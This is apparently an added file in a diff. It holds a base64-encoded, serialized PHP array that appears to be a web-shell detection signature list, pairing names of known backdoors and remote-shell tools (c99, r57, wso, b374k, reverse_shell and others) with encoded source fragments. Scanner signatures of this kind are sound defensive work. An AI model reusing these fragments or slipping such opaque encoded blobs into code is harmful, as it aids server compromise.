+UmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZE93b2dJQ0FrWkdWNklEMGdKSEIzWkdScGNpNGki
+O3M6MTQ6ImNtZFsxXVswXVtwaHBdIjtzOjY0OiJnSUNCbFkyaHZJQ0k4ZEdGaWJHVWdZbTl5WkdW
+eVBTY3hKeUIzYVdSMGFEMG5OakFsSno0OGRISStQSFJrUGlSIjtzOjIyOiJvbmJvb21zaGVsbFsw
+XVswXVtwaHBdIjtzOjY0OiJuUlZnNVQwSnVWamhZVGpkMlVVWmhLM1p4Yldob1FVeFNhamR5UVZR
+MVpFZ3JkbmRMYkhSQ2NYZFlMek5QZUZaIjtzOjE0OiJmeDBbMF1bMF1bcGhwXSI7czo2NDoiemFD
+Z2tjR0YwYUNrN0RRb0pmUTBLRFFvSmQyaHBiR1VnS0hOMGNuQnZjeWdrY0dGMGFDd2dKSEJoZEhS
+bGNtNCI7czoxOToid2ViYWRtaW5bNF1bMl1bcGhwXSI7czo2NDoiUW8vUGcwS1BFWlBVazBnYldW
+MGFHOWtQVkJQVTFRZ1JVNURWRmxRUlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WiI7czoyNjoic2hl
+bGxfdXBsb2FkZXJbMTJdWzBdW3BocF0iO3M6NjQ6IlVGQlFVRlJRVUpCUVdkM1FVRkJVQzh2THk4
+dlRXMWplazF0Wmk5TmVrcHRXbHB6ZWsxNlVDOHZla0ZCUVNJdUMiO3M6MjA6ImN0dF9zaGVsbFsw
+XVswXVtwaHBdIjtzOjY0OiI5eVpXRmphQ2drY21WMElHRnpJQ1J6YVhSbEtTQmxZMmh2S0NJOGJH
+aytKSE5wZEdWY2JpSXBPdzBLSUNBZ0lHIjtzOjE5OiJoYWNrZXJwc1sxXVswXVtwaHBdIjtzOjY0
+OiJtUnZWM0EyV0RoaVZqbDZhMHQzZW5OcVVuWjFSRmxYY0RZeU1tWndPRVJ6VnpReWNuUnNXVVZq
+WkdnelVuSlViIjtzOjIwOiJzdHVuc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoid29KQ1hOMWNHVnlL
+RzVsZHlCQ2IzSmtaWEpNWVhsdmRYUW9LU2s3Q2drSkNna0pkR1Y0ZENBOUlHNWxkeUJLWSI7czox
+OToiamF2YXNoZWxsWzBdWzBdW3B5XSI7czo2NDoiWW5WMGRHOXVJRzl1WTJ4cFkyczlYQ0owWlhO
+MFgzQnliMjF3ZENneUtWd2lJSFpoYkhWbFBWd2lJaTVsZENnbiI7czoyNToicGhwZmlsZW1hbmFn
+ZXJbM11bMl1bcGhwXSI7czo2NDoiWjNkWmMzWkdReXRsZG14alMwTmpWSGhuT0RGemR6aDBXRVJq
+UkROYU9GRm9NRVJhZGxrcmIybDJabGNyYmxCdyI7czoxNjoiYjM3NGtbM11bMF1bcGhwXSI7czo2
+NDoid2lZMjh1YVdRaUxDSnBaU0lzSW1OdkxtbHNJaXdpWTI4dWFXMGlMQ0pqYnk1cGJpSXNJbWx6
+SWl3aWFYUWlMQyI7czoyNzoic2Nhbm5lcl9qYXRpbWNyZXdbMF1bMF1bcGxdIjtzOjY0OiJNME5U
+WTNPRGt3S1M0aUt6QWlLVHNnZlNCbGJITmxJSHNnYVdZZ0tFQnRZV2xzS0NSMk1ERmlObVV5TURN
+c0lDIjtzOjIwOiJwaHBzaGVsbFszMF1bMF1bcGhwXSI7czo2NDoiOXliUzV6ZFdKdGFYUW9LU0kr
+Q2p3L2NHaHdDaThxSUU1dmR5QjNaU0J0WVd0bElHRWdiR2x6ZENCdlppQjBhRyI7czoxOToicGhw
+c2hlbGxbNF1bMF1bcGhwXSI7czo2NDoiMVF6WkhWYVdFbDJVak5LZG1SWVFUaE1Na2tyVUVNNU1G
+cEVORGhrUjFFclNVTkpOMGxEUVdkSlEwRm5SRkZ2WiI7czoxNToicjU3WzExXVswXVtwaHBdIjtz
+OjY0OiIxeDRNREJjZURBd1hIZ3dNRng0WlRsY2VHSXdYSGhtWlZ4NFptWmNlR1ptWEhobVpseDRN
+alZjZUdOaFhIZzFNIjtzOjI2OiJzaGVsbF91cGxvYWRlclsxN11bMF1bcGhwXSI7czo2NDoiRkkz
+U1V4aE4zbzRlRkZTZVZOVVdEbFRja05wZUZGU2VWTlVXRGxTTVc4eVJGRkZTRzV5UmpKRlFqVXlS
+RkZ1YSI7czoyNzoiYnJ1dGVfZm9yY2VfdG9vbFsyXVswXVtwaHBdIjtzOjY0OiJGdVlTd2dTR1Zz
+ZG1WMGFXTmhPeUJVUlZoVUxVUkZRMDlTUVZSSlQwNDZJRzV2Ym1VS2ZRb3VZMjl1ZEdWdWRDIjtz
+OjE2OiJyYWRlclswXVswXVthc3BdIjtzOjY0OiJrSkpVVXBVVlZNMFIxZE5RamhWUkZWMFVUVkRj
+MVZ4ZGtkdWR6ZDRTMGRxUlVOcVIwSkRNa2w1UTFNNWRqRlRSIjtzOjI1OiJzaGVsbF91cGxvYWRl
+cls4XVswXVtwaHBdIjtzOjY0OiIwK0pHTjVZbVZ5TVRjelgyUmxZMjlrWlNncE93MEtMeW9nZEdG
+dWEzTWdabTl5T2lCTmNsOUhZVzVFY25WdVdDIjtzOjIxOiJjeWJlcnNoZWxsWzJdWzBdW3BocF0i
+O3M6NjQ6IlRvOGFXNXdkWFFnZEhsd1pUMGlkR1Y0ZENJZ2JtRnRaVDBpYjJ4a2JtRnRaU0lnZG1G
+c2RXVTlJakJzWkNCdVkiO3M6MjA6Im5leHBsMHJlclswXVswXVtwaHBdIjtzOjY0OiJ5Y3NKMkp6
+YUdWc2JDYzlQaWRDYVc1a2MyaGxiR3duTENkcmFXeHNKejArSjB0cGJHd2dVMmhsYkd3bktUc05D
+IjtzOjE1OiJnb29uWzBdWzBdW3BocF0iO3M6NjQ6IkFnSUNBOFptOXVkQ0J6YVhwbFBTSXlJaUJt
+WVdObFBTSlVZV2h2YldFaVBrWjBjQ0E4TDJadmJuUStEUW9nSUMiO3M6MTc6ImNwYW5lbFsyXVsw
+XVtwaHBdIjtzOjY0OiJiaUFpTGlKUVF6a3dJRm9nSWk0aVdDQWlMaUpvTUNCWklDSXVJbGhLYkZs
+VU5HNVBNekFnVGlCRElpNGliVlpxIjtzOjIzOiJzaW1wbGVfc2hlbGxbMl1bMF1bcGhwXSI7czo2
+NDoiWVdSNk1uSjROSFZsTmpNeU4zRXhXZzBLVUV3elNVNTJkbHA0TDNCRUwzcGFaa3RFTjJST1My
+WTFNREJKY0dzeiI7czoxNjoiZmVuaXhbMF1bMF1bcGhwXSI7czo2NDoiaGpiMlJsWkNCaWVTQmth
+VzVuWjI4cExTMCtQQzltYjI1MFBqd3ZZMlZ1ZEdWeVBnb2lPd29LQ21sbUlDZ2hhWCI7czoxNjoi
+bXlzcWxbMl1bMF1bcGhwXSI7czo2NDoiaVBnMEtQSFJsZUhSaGNtVmhJSEp2ZDNNOUlqRTVJaUJ1
+WVcxbFBTSlRNU0lnWTI5c2N6MGlPRGNpUGljN0RRcCI7czoyNjoiaXRzZWN0ZWFtX3NoZWxsWzBd
+WzBdW3BocF0iO3M6NjQ6ImJHUmxjaXhVVWxWRkRRcHlaWE53YjI1elpTNTNjbWwwWlNnaVJtOXNa
+R1Z5T2lBaUlDWWdjMlZzUm05c1pHVnkiO3M6MTg6Im50ZGFkZHlbMV1bMF1bYXNwXSI7czo2NDoi
+dldGTUtVVkpUUWtZNGREWllWRTR5V1VoaVVXeDZWVmxyTm5GcGRVbHNiRk56ZFhweGEyOUhWMDVp
+V21oMWQyWSI7czoxNjoiYjM3NGtbMF1bMF1bcGhwXSI7czo2NDoiVTBWTVJpZGRMaUkvWVdOMFBX
+MWhibUZuWlhJbVpHVnNQU0l1SkdSakxpSStSR1ZzUEM5MFpENGlPd29rWkdseSI7czoxNzoibnNo
+ZWxsWzFdWzBdW3BocF0iO3M6NjQ6IkFpZEdsdFpXOTFkQ0lLQ1dWc2MyVTZDUW9KQ1dsbUlIQjNY
+Mmx1SUQwOUlGQlhPZ2tLQ1FrSlkyOXViaTV6WlciO3M6MjE6InBoeXRvbnNoZWxsWzBdWzBdW3B5
+XSI7czo2NDoibkJ2Y0dWdUlpa3BldzBLWm5WdVkzUnBiMjRnYlhsemFHVnNiR1Y0WldNb0pHTnZi
+VzFoYm1RcElIc05DbWxtSSI7czoyMToibG9jdXNzaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJqYkhW
+a1pTZ2lMMlYwWXk5d1lYTnpkMlFpS1RzTkNtbHVhVjl5WlhOMGIzSmxLQ0p6WVdabFgyMXZaR1Vp
+S1RzIjtzOjIwOiJyb290c2hlbGxbMl1bMF1bcGhwXSI7czo2NDoiRzF3VjBGUFFWZFlVVEJ1TlVK
+UlBUMG5LU2twT3lCOURRcGxiSE5sSUhzZ1pYWmhiQ2huZW1sdVpteGhkR1VvWSI7czoyNToic2hl
+bGxfdXBsb2FkZXJbNV1bMF1bcGhwXSI7czo2NDoiK1BHSnlQaWM3RFFwbFkyaHZJQ2RUWlhKMlpY
+SWdhVzVtYjNKdFlYUnBiMjV6UEdKeVBqeGljajRuT3cwS1pXTiI7czoxOToiYmFja2Rvb3JbMF1b
+MF1bcGhwXSI7czo2NDoiUXpRNFZrNWxla2hQZEc4M2JVVnpOSFo2VjBoRWNIRkhkR3hoTjBnM2My
+UTVVQ3MzUWpaSVNqQldjWGc0ZFRkNSI7czoyOToiZ29oYWNrX3Bvd2Vyc2VydmVyWzBdWzBdW3Bo
+cF0iO3M6NjQ6IkFnSUNBZ0lDQWdJQ0FnYlhrZ0pHNWhkSEpwZUNBOUlDUXhPdzBLSUNBZ0lDQWdJ
+Q0FnSUNBZ2JYa2dKR0Z5WnkiO3M6MTg6InNoZWxsYm90WzJdWzBdW3BsXSI7czo2NDoiWW9JQ1Jm
+VUU5VFZGc25YMlZrYVhRblhTQXBJSHNLQ1dWamFHOGdKenhpY2o0OFptOXliU0J1WVcxbFBTSjBa
+WCI7czoxNToiY21kWzMyXVswXVtwaHBdIjtzOjY0OiJHVXdYSGcyTmx4NE9EbGNlRFExWEhoalpW
+eDRaVGhjZUdGaFhIaG1NbHg0Wm1aY2VHWm1YSGc0TTF4NFl6UmNlIjtzOjI0OiJzaGVsbF9leHBs
+b2l0WzBdWzBdW3BocF0iO3M6NjQ6IkZyT3dvSkNXTmhjMlVnTlRvS0NRa0pabTl5S0Rza1gxQlBV
+MVJiSjNBeUoxMGdQRDBnSkY5UVQxTlVXeWR3TXkiO3M6MTk6Im9yYnNoZWxsWzFdWzBdW3BocF0i
+O3M6NjQ6IlJmVUU5VFZGc2laaUpkSUQ4K0RRbzhQeUI5SUQ4K0RRbzhQeUFrZEdWemRGOW1kVzVq
+SUQwZ1kzSmxZWFJsWDIiO3M6MTQ6ImNtZFs5XVswXVtwaHBdIjtzOjY0OiJSUVdabmEzSk5NbmRE
+Y0RWbFYwUk5OSEozZVVNdlYwUndVek4wUTNSMFJWRTJXVEpyWTFwR1RtOXdSRzlwU2pSIjtzOjE5
+OiJha2F0c3VraVswXVswXVtwaHBdIjtzOjY0OiJUUlZKV1JWSmZWa0ZTVTFzblNGUlVVRjlZWDBa
+UFVsZEJVa1JGUkY5R1QxSW5YU2twZXdvZ0lHVmphRzhnSWp4IjtzOjE0OiJnZnNbMV1bMF1bcGhw
+XSI7czo2NDoiWFRYaG1SRU4zVTB4SFRYVndTVVY0UzBWdVZYQXZkMnhrY1dSWWRsSmlkVkJvY0do
+Wk1YRTJjbUk0Vm1aS1owWiI7czoxNzoiYjM3NGtbMTBdWzBdW3BocF0iO3M6NjQ6ImpBM1EybFNj
+RmxYVW10amFqRndZbTFXTUZneVJqQmlNalJ2U2toU2FHTnRaR3hrUTJ0blpraDNaMXBIYkd4TFEi
+O3M6MTc6ImNvZGVyelswXVswXVtwaHBdIjtzOjY0OiJrTnZiblJsYm5RdGRIbHdaVG9nZEdWNGRD
+OW9kRzFzWEc1Y2JpSTdEUXB3Y21sdWRDYzhJVVJQUTFSWlVFVWdhIjtzOjE5OiJwcml2OF9zY3Jb
+MV1bMF1bcGxdIjtzOjY0OiJjeEp6c0tDbWxtS0NSZlUwVlRVMGxQVGxzbllXNG5YVDA5TUNsN0Nt
+VmphRzhnSkdobFlXUmxjanNLWldOb2J5IjtzOjI1OiJhbnRpY2hhdF9zaGVsbFswXVswXVtwaHBd
+IjtzOjY0OiJ3K0NqeG9aV0ZrUGdvOGRHbDBiR1UrVW5VeU5GQnZjM1JYWldKVGFHVnNiQ0F0SUNJ
+dUpGOVFUMU5VV3lkamJXIjtzOjE0OiJjbWRbMl1bMF1bcGhwXSI7czo2NDoiUEw4SUNBZ0lDQWdJ
+Q0FnSUNBZ1hDSWdQaUk3Q21WamFHOGdJZ284YUhJZ2QybGtkR2c5WENJeE1EQWxYQ0lnYyI7czoy
+MToiY3liZXJzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJFMVVpdFFSa0pSTTBWdmJXZFNOSFJpYkhw
+WlpVRldialF2VTNjMU5teHFXa053UWpWdFdIQnhibU01UmtaQk1XIjtzOjIwOiJob3N0ZGV2aWxb
+MV1bMF1bcGhwXSI7czo2NDoiVjlsYm1ReExpUm1aVHNLZlFwcFppZ2tiWGx6Y1d4ZmIyNThmQ1J0
+YzNOeGJGOXZibng4SkhCblgyOXVmSHdrYiI7czoxNToicjU3WzE2XVswXVtwaHBdIjtzOjY0OiJn
+a2Jpd2tkSGgwUFNjbktRcDdDbVZqYUc4Z0p6eDBZV0pzWlNCM2FXUjBhRDB4TURBbElHTmxiR3h3
+WVdSa2FXIjtzOjE0OiJyNTdbOF1bMF1bcGhwXSI7czo2NDoia2NtVnpPdzBLQ1FrSmZRMEtDUWw5
+RFFvSkNTUnpkV05qWlhOeklEMGdNRHNOQ2drSkpHRjBkR1Z0Y0hSeklEMCI7czoxNDoid3NvWzFd
+WzBdW3BocF0iO3M6NjQ6IldGdVpDZGRLU2tOQ2cwS0NRa0pDUWw3RFFvTkNna0pDUWtKQ1hCeWFX
+NTBJQ0k4Y0hKbFBpSTdEUW9OQ2drSkMiO3M6MjA6Imlyb25zaGVsbFswXVswXVtwaHBdIjtzOjY0
+OiJDQWdJQ0FpTWpFNFhDNHhPRnd1TVRjMFhDNHlOeUlzRFFvZ0lDQWdJQ0FnSUNJMk5Wd3VNek5j
+TGpnM1hDNDVOIjtzOjI0OiJzcGFtX3RydXN0YXBwWzFdWzFdW3BocF0iO3M6NjQ6Im1NakJtT0Rn
+elpTSTdDaVJqYjJ4dmNpQTlJQ0lqWkdZMUlqc0tKR1JsWm1GMWJIUmZZV04wYVc5dUlEMGdKMFoi
+O3M6MjA6ImZpbGVzbWFuWzE1XVswXVtwaHBdIjtzOjY0OiJTZ2tYMU5GVWxaRlVsc25TRlJVVUY5
+SVQxTlVKMTB1SjE5TmVWTlJUQzV6Y1d3bktUc0tDZ29LQ1dobFlXUmxjIjtzOjE3OiJwaHBzcHlb
+MV1bMF1bcGhwXSI7czo2NDoiUEQ5d2FIQWdjR0Z6YzNSb2NuVW9aMlYwWlc1MktDSklWRlJRWDBG
+RFEwVlFWRjlNUVU1SFZVRkhSU0lwS1RzZyI7czoyNjoiYWNjZXB0X2xhbmd1YWdlWzBdWzBdW3Bo
+cF0iO3M6NjQ6ImtYMUJQVTFSYkozQXhKMTBnUFQwZ0ozbGxjeWNwQ2drSmFXWW9RSFZ1YkdsdWF5
+aHdjbVZuWDNKbGNHeGhZMlUiO3M6MjA6ImZpbGVzbWFuWzIxXVswXVtwaHBdIjtzOjY0OiIwaWMy
+TmhiblI1Y0dVaVBnMEtJQ0FnSUNBZ0lDQWdQRzl3ZEdsdmJpQjJZV3gxWlQwaU1TSStEUW9nSUNB
+Z0lDIjtzOjIwOiJmaWxlc21hblsyNV1bMF1bcGhwXSI7czo2NDoid1pTSXNJQ0ozSWlrc0lDQXZM
+eUJ6ZEdSdmRYUWdhWE1nWVNCd2FYQmxJSFJvWVhRZ2RHaGxJR05vYVd4a0lIZCI7czoyMjoic2hl
+bGxhdGlsZGlbMV1bMF1bcGhwXSI7czo2NDoiM0p6Snl3Z01DazdEUXBBYzJWMFgzUnBiV1ZmYkds
+dGFYUW9NQ2s3RFFwQWMyVjBYMjFoWjJsalgzRjFiM1JsYyI7czoyMDoiMW43M2N0aW9uWzBdWzBd
+W3BocF0iO3M6NjQ6ImtZWFJoSjMwdURRb2pJRTkwYUdWeUlIWmhjbWxoWW14bGN5QmpZVzRnWW1V
+Z1lXTmpaWE56WldRZ2RYTnBibWMiO3M6MTk6ImNnaS1zaGVsbFswXVswXVtwbF0iO3M6NjQ6Inlh
+VzVuSUdSemRGQmhkR2dwSUhzS0NXSnZiMnhsWVc0Z1lsSmxkQ0E5SUhSeWRXVTdDZ2tLQ1hSeWVT
+QjdDZ2siO3M6MjM6ImpzcHdlYnNoZWxsWzBdWzBdW2phdmFdIjtzOjY0OiJCcFlqTldNR05JVmpC
+SmFVSXlXVmQ0TVZwVU1HbEtlbk5uV2xkT2IySjVRV3RpTTFZd1kwaFdNRTk1UW14Wk1tIjtzOjE1
+OiJjbWRbMzNdWzBdW3BocF0iO3M6NjQ6ImdQRDl3YUhBTkNpOHFJRTV2ZHlCM1pTQnRZV3RsSUdF
+Z2JHbHpkQ0J2WmlCMGFHVWdaR2x5WldOMGIzSnBaWE0iO3M6MjM6ImF5eWlsZGl6X3RpbVsxXVsw
+XVtwaHBdIjtzOjY0OiIwTjNaVzA0TDFRdlkzWm9ZMkV5WkVzelZrdEtMMlUzSzNrNFdHUjVPRWhs
+YVRVM1RVMDVXWEJWZHk5SWJ5OHphIjtzOjE1OiJjOTlbMThdWzBdW3BocF0iO3M6NjQ6IkdaMWJt
+TjBhVzl1WDJWNGFYTjBjeWduYjJOcFgyTnZibTVsWTNRbktTa2dEUW9nSUNBZ0lDQWdJQ1IwWlcx
+d1ciO3M6MjA6ImZpbGVzbWFuWzEzXVswXVtwaHBdIjtzOjY0OiJYM0psYzNSdmNtVW9JbTl3Wlc1
+ZlltRnpaV1JwY2lJcE93b2tiR2w2TUQxemFHVnNiRjlsZUdWaktDUmZVRTlUIjtzOjE4OiJsaXpv
+emltWzBdWzBdW3BocF0iO3M6NjQ6ImdiblZzYkRzS0pIVmtJRDBnZFhKc1pXNWpiMlJsS0NSa0tU
+c0tQejRLUEdoMGJXdytQR2hsWVdRK1BHMWxkR0UiO3M6MTQ6ImM5OVs2XVswXVtwaHBdIjtzOjY0
+OiJHVmphRzhnSWlSZlUwVlNWa1ZTVzFCSVVGOVRSVXhHWFNJZ095QS9QaUlnYldWMGFHOWtJRDBn
+SW5CdmMzUWlQIjtzOjIyOiJyZW1vdGVzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJWY01UWXlYSGcz
+TUZ4NE4yTmNNVFUxYzI1Y01UUXlYSGcyWmx4NE56UjhZMXg0TnpKY01UUXhYREUyTjJ4bGNuIjtz
+OjI2OiJzaGVsbF91cGxvYWRlclsxNl1bMF1bcGhwXSI7czo2NDoid00zcFhTMjVTWmtsaVJtaDBV
+RFZ4UlcxSE4xVnhXVXhRVkV4b1ZIUlVkMDl2YkhKTVUwSkRkM1F4ZGtOaFJrRiI7czoyMToibm9n
+cm9kcEJvdFsxXVsxXVtwaHBdIjtzOjY0OiJCcGMyRm9hMkZ1SUdSbGJtZGhiaUJ6Y0dGemFRMEtE
+UW92S2lvcUlFRmtiV2x1SUNvcUtpOE5DaVJoWkcxcGJpIjtzOjIxOiJnYXVsaXJjYm90WzBdWzJd
+W3BocF0iO3M6NjQ6IjJodklDSWdJRHgwWkNCdWIzZHlZWEFnWTI5c2MzQmhiajFjSWpaY0lpQnpk
+SGxzWlQxY0luQmhaR1JwYm1jdGIiO3M6MTU6ImVybmVbMF1bMF1bcGhwXSI7czo2NDoiTnBlbVU5
+TVRFd1Bqd3ZabTl5YlQ0OEwyTmxiblJsY2o0OFluSStDaUk3Q21sbUtFQWtYMUJQVTFSYkozTm9K
+MSI7czoxNDoiaW1nWzBdWzBdW3BocF0iO3M6NjQ6IngxYzJnb0tUc0tJQ0FnSUNBZ0lDQWdJQ0Fn
+SUNBZ0lDQWdJQ0FnSUNBZ2NtVjBkWEp1SUhKbGNHeGhZMlZPWlgiO3M6MTk6InB3bnNoZWxsWzBd
+WzBdW2pzcF0iO3M6NjQ6IlZ5ZG1WeVd6RmRMQ0FrYkdsdVpWc3dYU3dnSkhSdGNDa2dLU0I3RFEw
+S0NRa0pDUWtKQ1NSemRXTmpaWE56S3kiO3M6MTk6ImZpbGVzbWFuWzhdWzBdW3BocF0iO3M6NjQ6
+Im9KZlEwS2ZRMEtEUXAzYUdsc1pTZ2tiR1YyWld3dExTa2dZMmhrYVhJb0lpNHVJaWs3RFFvTkNp
+UmphQ0E5SUciO3M6MjY6Iml0c2VjdGVhbV9zaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJJNU1EUmlP
+R05tWXpRNE5EZGpOVFZpTmlJN0lHbG1LR2x6YzJWMEtDUmZVa1ZSVlVWVFZGc25jSFZtWkcxeUox
+IjtzOjE1OiJjbWRbMjldWzBdW3BocF0iO3M6NjQ6IlZGVTFSYkoyTnRaQ2RkS1NsN0RRb2dJQ0Fn
+SUNBZ0lHVmphRzhnSWp4d2NtVStJanNOQ2lBZ0lDQWdJQ0FnSkciO3M6MTU6ImNtZFsyMF1bMF1b
+cGhwXSI7czo2NDoiVlFzSUNkVlZFWXRPQ2NwT3dvZ0lDQWdJQ0I5Q2dvZ0lDQWdJQ0IzYUdsc1pT
+QW9JV1psYjJZb0pHbHZXekpkSyI7czoyMDoiZGl2ZXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6Ik1U
+QXdJaUIyWVd4MVpUMGlQRDhnWldOb2J5QWtZM1Z5WkdseU95QS9QaUkrUEM5MFpENEtJQ0FnSUNB
+Z1BIUmsiO3M6MjA6ImxhbWFzaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJsSUcxbGRHaHZaRDF3YjNO
+MElHVnVZM1I1Y0dVOWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlUNGdKRzV2ZDJGIjtzOjIwOiJw
+aHBzaGVsbFsyM11bMF1bcGhwXSI7czo2NDoiZ2RHVnliWE1nWVhKbElHNXZkQ0JoWTJObGNIUmhZ
+bXhsSUhSdklIbHZkU3dnZEdobGJnMEtMeThnWkc4Z2JtOSI7czoyNDoicmV2ZXJzZV9zaGVsbFsw
+XVswXVtwaHBdIjtzOjY0OiJpQmxibU52ZFc1MFpYSmxaQ0JoYmlCcGJuUmxjbTVoYkNCbGNuSnZj
+aUJ2Y2dwdGFYTmpiMjVtYVdkMWNtRjBhIjtzOjE5OiJtb2hhamVyMjJbMF1bMF1bcGxdIjtzOjY0
+OiJvU1dsR01VbElSV2xqVTBGcFNYbFphRWxwUVhOSmVWRm5aSGxGYUVwNVkybGthV05vU1ZORmFF
+bFRRWFJKZVRCIjtzOjIwOiJmaWxlc21hblsxOV1bMF1bcGhwXSI7czo2NDoibFJ6TllValJrYjNo
+bmVsSkpWMk5XVFc1amNVVjNURmMxZW5Wd09WZGpXV050ZW1WcVVEZFdObmRNYWxkM09XOCI7czox
+ODoid2Vicm9vdFswXVswXVtwaHBdIjtzOjY0OiJodklDUjBZV0pzWlY5MWNESTdDbVZqYUc4Z0pH
+WnZiblE3Q21WamFHOGdJanhpUGlJdWQzTW9NamNwTGlSc1lXIjtzOjE0OiJyNTdbMF1bMF1bcGhw
+XSI7czo2NDoiMHRMUzB0TFMwdExTMHRDZ29nSUVScGJTQnZVMk55YVhCMENpQWdSR2x0SUc5VFkz
+SnBjSFJPWlhRS0lDQkVhVyI7czoxNDoiY21kWzBdWzBdW2FzcF0iO3M6NjQ6ImxZVDRpT3cwS0pI
+Tm1iblE5SWp4bWIyNTBJR1poWTJVOWRHRm9iMjFoSUhOcGVtVTlNaUJqYjJ4dmNqMGpNREEiO3M6
+MTM6Im1tWzBdWzBdW3BocF0iO3M6NjQ6Ik5EVWs5TVRFSkJVaTFCVWxKUFZ5MURUMHhQVWpvZ0l6
+TTJNMlEwWlRzS1UwTlNUMHhNUWtGU0xWUlNRVU5MTFUiO3M6MTg6Im5zdHZpZXdbMl1bMF1bcGhw
+XSI7czo2NDoiVEl1Tmk0MExYQnNNaThuTEFvbkwzQm9jRTE1UVdSdGFXNHRNaTQyTGpRdGNHd3pM
+eWNzQ2ljdmNHaHdUWGxCWiI7czoyOToicGhwbXlhZG1pbl9leHBsb2l0WzBdWzBdW3BocF0iO3M6
+NjQ6Ik1sRm1ZbnBLVFhwM2FDdENTVXNLWWtGUFNUUmpTRzgyVjJNMFp5dFlUR2hGVDI5cGVHVjBl
+RGxFYmpOT2FtZFAiO3M6MTY6ImIzNzRrWzJdWzBdW3BocF0iO3M6NjQ6InBPT1ZKYU1FWTJiMjFW
+TkRZMFkwbFBNRUZqTVVkeVdVeGtlV2hNUkRkVVVITkVMM0IwVFN0NVlXMXNSRGw2ZEQiO3M6MjY6
+InNoZWxsX3VwbG9hZGVyWzEzXVswXVtwaHBdIjtzOjY0OiJlR3R5YjNKcElEMGdJbUU0WVRRM1l6
+QmhNVFkzTjJZd04yTmhaV1V3T0dGa1ptVmlOVGt6WldRd0lqc2dhV1lvIjtzOjE1OiJjbWRbMzVd
+WzBdW3BocF0iO3M6NjQ6InZZMnRsZENrN0RRcDlEUXB6Wlc1a2NtRjNLQ1JKVWtOZlkzVnlYM052
+WTJ0bGRDd2dJbEJTU1ZaTlUwY2dKSEIiO3M6MTk6ImVtcGl4Y3Jld1swXVswXVtwbF0iO3M6NjQ6
+Ind2ZEhJK0lqc05DZzBLY0hKcGJuUWdJangwY2o0OGRHUStQR0krUTJoaGJtZGxJR1JwY21WamRH
+OXllVG84TDIiO3M6MTY6IndvcnNlWzFdWzBdW3BocF0iO3M6NjQ6IlZWSkZKMTB1SWp3dlptOXVk
+RDQ4TDNSa1BpSTdDbkJ5YVc1MElDQWdJQ0k4TDNSeVBpSTdDbkJ5YVc1MElDQWciO3M6MTU6Indp
+bnhbMF1bMF1bcGhwXSI7czo2NDoiWlROWll6SmFXRGRzZFdOMk5sbEdlalpCWjBSbE5YRmFTR1V4
+TlN0bmRreHZVMDFtTkhsSFFteDJOSFpwTUhoViI7czoxNToid3NvWzExXVswXVtwaHBdIjtzOjY0
+OiJQWHQ5S1R0MllYSWdaejFqTG1JdVkyeHBZMnM3WjN4OEtHYzlZeTVpTG1Oc2FXTnJQWHQ5TEdN
+dWIyNWpiR2xqIjtzOjE3OiJiMzc0a1sxNF1bMF1bcGhwXSI7czo2NDoibHg0WmpWY2VHUTJYSGhq
+WTF4NE5tVmNlR0poWEhnd1pseDRNalJjZUdNMlhIZzVZMXg0TkdWY2VHTTBYSGhsTiI7czoxNToi
+Yzk5WzE1XVswXVtwaHBdIjtzOjY0OiJ5OHZPVlJaTkRBMVYyWnhUMjEyYWtrcllraHZZVzlSYzAx
+UmVGSXJkWFZpYmpkaWRTc3daaTh2TDNsSU5VSkJSIjtzOjE3OiJjb2RlcnpbMV1bMF1bcGhwXSI7
+czo2NDoiUmxJRDBnUUdsdWFWOW5aWFFvSjNOaFptVmZiVzlrWlNjcE93MEthV1lvSVNSellXWmxY
+MjF2WkdVcERRb2dJQyI7czoxNDoid3NvWzldWzBdW3BocF0iO3M6NjQ6IlBqeGhJR2h5WldZOUp5
+UlFTRkJmVTBWTVJqOWhZM1JwYjI0OWRYUnBiSE1tWTI5dGJXRnVaRDF6YUc5M1gzQnkiO3M6MTY6
+Im15c3FsWzNdWzBdW3BocF0iO3M6NjQ6IlNkdUp6NDhabTl1ZENCbVlXTmxQWFJoYUc5dFlTQnph
+WHBsUFMweVBqeGlQbTh0TFMxYklGTnVTWEJGY2w5VFEiO3M6MjI6InNuaXBlcnNoZWxsWzFdWzBd
+W3BocF0iO3M6NjQ6IkZsYlhFM1RuRjNPSE5ZUWxrd01sWTBkM1F3UnpscWRIZFhUSEpIZUVoaGJW
+Rm1URzA0UVhKU1pETm1MM3BtUXoiO3M6MjA6ImZpbGVzbWFuWzIyXVswXVtwaHBdIjtzOjY0OiJo
+Y25KaGVTazdDaUFnSUNBZ0lDQWdmUW9nSUNBZ0lDQWdJQ1JmVUU5VFZDQTlJSE4wY21sd2MyeGhj
+MmhsYzE5IjtzOjE0OiJ3c29bM11bMF1bcGhwXSI7czo2NDoidG1abWhWV21velNIaE1SVVJ0Y2pG
+SlowbG5jVlY1WTJoTFMzVTRjamsyYlVKRVNHdFFTRWcwYW5ZNGJTOUtVMCI7czoxNToid3NvWzEw
+XVswXVtwaHBdIjtzOjY0OiJmWW5WbVpsOXdjbVZ3WVhKbEtDazdJQTBLYVdZZ0tDRm1kVzVqZEds
+dmJsOWxlR2x6ZEhNb0ltTTVPVjl6WlhOIjtzOjE5OiJwaHBzaGVsbFs1XVswXVtwaHBdIjtzOjY0
+OiJZakkxTUVsSFRuWmlSemw1VUZOSmFrMUVRa2RTYWtGM1NXbzFNMlF6WTNWUldFcG9XV2t4UTJK
+SFJtcGhNbWhvIjtzOjI0OiJhcmFiX2JsYWNrX2hhdFsxXVswXVtwbF0iO3M6NjQ6ImdKR2x6YkdG
+emRDQTlJR0Z5Y21GNUtEQWdQVDRnVkZKVlJTazdDZ2xsWTJodktDSUpQSFJ5UGx4dUlpazdDZ2wi
+O3M6MTk6IndlYmFkbWluWzBdWzJdW3BocF0iO3M6NjQ6IjJGaWMyOXNkWFJsSnpzS1gzRXVjM1I1
+YkdVdWQybGtkR2dnUFNBbk1UWndlQ2M3Q2w5eFcxOXVYU2duWm5KaGIiO3M6MTY6InB6YWR2WzFd
